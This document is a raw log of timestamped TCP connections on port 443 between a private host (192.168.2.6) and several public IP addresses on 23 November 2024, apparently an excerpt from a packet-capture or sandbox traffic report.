Nov 23, 2024 07:09:24.700198889 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.700216055 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.721720934 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.721749067 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.721858025 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.722829103 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.722841978 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.844806910 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:24.844841957 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:24.845407009 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:24.846343040 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:24.846354961 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:24.943613052 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.943645000 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.943742990 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.947011948 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.947026968 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.989063978 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.989103079 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.989126921 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.989202976 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.989249945 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.991153955 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.000761032 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.003566027 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.003802061 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.003935099 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.003966093 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.011909962 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.011944056 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.013875961 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.014655113 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.014669895 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.042943001 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.043237925 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.047038078 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.047069073 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.048043013 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.048057079 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.071583033 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.071640015 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.071675062 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.071701050 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.071731091 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.071768999 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.071803093 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.079523087 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.079871893 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.079969883 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.081679106 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.081708908 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.086334944 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.086370945 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.086468935 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.086492062 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.086613894 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.095154047 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.102442980 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.102650881 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.102673054 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.159053087 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.190963984 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.238045931 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.260950089 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.272597075 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.272687912 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.272717953 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.281267881 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.281517029 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.281534910 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.294820070 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.294944048 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.294960976 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.307910919 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.308015108 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.308031082 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.322813988 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.323014975 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.323031902 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.333970070 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.334048986 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.334080935 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.347100973 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.347352028 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.347368956 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.359206915 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.359421015 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.359440088 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.371215105 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.371256113 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.371517897 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.371529102 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.371875048 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.383069992 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.395433903 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.395644903 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.395657063 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.404062033 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.404841900 CET	49754	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.404864073 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.407017946 CET	49754	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.407023907 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.447104931 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.447124958 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.458270073 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.458513021 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.458825111 CET	49752	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.458834887 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.459639072 CET	49752	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.459640980 CET	49753	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.459644079 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.459671021 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.460102081 CET	49753	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.460108995 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.462342978 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.462446928 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.462590933 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.462630033 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.463289022 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.467344999 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.473917007 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.474004984 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.474021912 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.478879929 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.479022026 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.479038000 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.491252899 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.491393089 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.491405010 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.497980118 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.502018929 CET	49750	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.502037048 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.503176928 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.503901958 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.504049063 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.504060984 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.514944077 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.515033007 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.515049934 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.519980907 CET	49750	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.519990921 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.520768881 CET	49751	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.520782948 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.523019075 CET	49751	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.523025036 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.526725054 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.526916027 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.526926994 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.531897068 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.531923056 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.531936884 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.531985044 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.531985044 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.532058954 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.532134056 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.532248020 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.538310051 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.538378000 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.538388968 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.549827099 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.549909115 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.549920082 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.561536074 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.561709881 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.561728001 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.572598934 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.572685957 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.572704077 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.583102942 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.583276987 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.583291054 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.592804909 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.592880964 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.592911959 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.602648973 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.602746964 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.602762938 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.611274958 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.611352921 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.611363888 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.620196104 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.620289087 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.620306015 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.630388975 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.630471945 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.630487919 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.640387058 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.641038895 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.641053915 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.646879911 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.646954060 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.646969080 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.652591944 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.652664900 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.652679920 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.658258915 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.658788919 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.658803940 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.669284105 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.669630051 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.669645071 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.671149015 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.671359062 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.671375036 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.674467087 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.674885988 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.674901962 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.679932117 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.680012941 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.680030107 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.685343981 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.685498953 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.685514927 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.692203045 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.692339897 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.692354918 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.705074072 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.705154896 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.705171108 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.706410885 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.706499100 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.706513882 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.716109037 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.716170073 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.716191053 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.717210054 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.717261076 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.717276096 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.717601061 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.717667103 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:25.717715025 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:25.719579935 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.719604969 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.719666958 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.719713926 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.719743967 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.719794989 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.769078016 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.769098997 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.769150019 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.769174099 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.769205093 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.769227982 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.840492010 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.840574980 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.840619087 CET	49754	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.842839003 CET	49754	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.842859030 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.842869997 CET	49754	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.842875957 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.849879980 CET	49761	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.849912882 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.850182056 CET	49761	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.850666046 CET	49761	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.850680113 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.885826111 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.885849953 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.885898113 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.885937929 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.885965109 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.885984898 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.901381016 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.901448011 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.901493073 CET	49752	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.901906013 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.901966095 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.902004957 CET	49753	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.906672001 CET	49752	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.906672001 CET	49752	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.906682968 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.906686068 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.908143044 CET	49753	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.908155918 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.908169031 CET	49753	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.908175945 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.912628889 CET	49762	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.912658930 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.912746906 CET	49762	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.913140059 CET	49763	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.913167000 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.913209915 CET	49763	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.914959908 CET	49762	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.914971113 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.915144920 CET	49763	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.915163994 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.917629004 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.917645931 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.917695045 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.917710066 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.917743921 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.917783022 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.942645073 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.942662954 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.942727089 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.942744970 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.942800045 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.952416897 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.952471018 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.952510118 CET	49750	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.952753067 CET	49750	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.952754021 CET	49750	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.952768087 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.952773094 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.957871914 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.957937002 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.957990885 CET	49751	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.960604906 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.960625887 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.960668087 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.960717916 CET	49751	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.960726023 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:25.960731983 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.960742950 CET	49751	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.960747957 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.960767031 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.960792065 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:25.974489927 CET	49767	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.974526882 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.974590063 CET	49767	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.975023031 CET	49767	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.975035906 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.976035118 CET	49768	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.976073980 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:25.976154089 CET	49768	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.976437092 CET	49768	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:25.976453066 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:26.075541019 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.075608015 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.075608969 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.075650930 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.075679064 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.075695992 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.089421034 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.089440107 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.089504004 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.089525938 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.089566946 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.104208946 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.104249954 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.104279041 CET	49749	443	192.168.2.6	150.171.27.10
